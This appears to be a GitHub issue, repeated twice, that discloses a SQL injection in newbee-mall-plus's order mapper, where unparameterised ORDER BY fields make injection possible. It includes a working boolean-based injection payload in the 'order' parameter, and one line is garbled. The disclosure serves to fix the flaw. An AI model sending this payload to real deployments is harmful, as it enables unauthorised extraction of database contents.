You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
SQL injection exists in newbee mall, est="sortField!" on order page = null and order!= null">
order by ${sortField} ${order} is not precompiled, allowing logged-in user attackers to steal sensitive information such as databases by constructing malicious sql statements.
newbee-mall-plus-main\src\main\resources\mapper\NewBeeMallOrderMapper.xml
Payload: _search=false&nd=1693539277711&limit=20&page=111&sidx=createTime&order=desc,(SELECT (CASE WHEN (1153=1153) THEN 1 ELSE 1153*(SELECT 1153 FROM INFORMATION_SCHEMA.PLUGINS) END))&totalrows=
The text was updated successfully, but these errors were encountered:
SQL injection exists in newbee mall, est="sortField!" on order page = null and order!= null">
order by ${sortField} ${order} is not precompiled, allowing logged-in user attackers to steal sensitive information such as databases by constructing malicious sql statements.
newbee-mall-plus-main\src\main\resources\mapper\NewBeeMallOrderMapper.xml
Payload: _search=false&nd=1693539277711&limit=20&page=111&sidx=createTime&order=desc,(SELECT (CASE WHEN (1153=1153) THEN 1 ELSE 1153*(SELECT 1153 FROM INFORMATION_SCHEMA.PLUGINS) END))&totalrows=
The text was updated successfully, but these errors were encountered: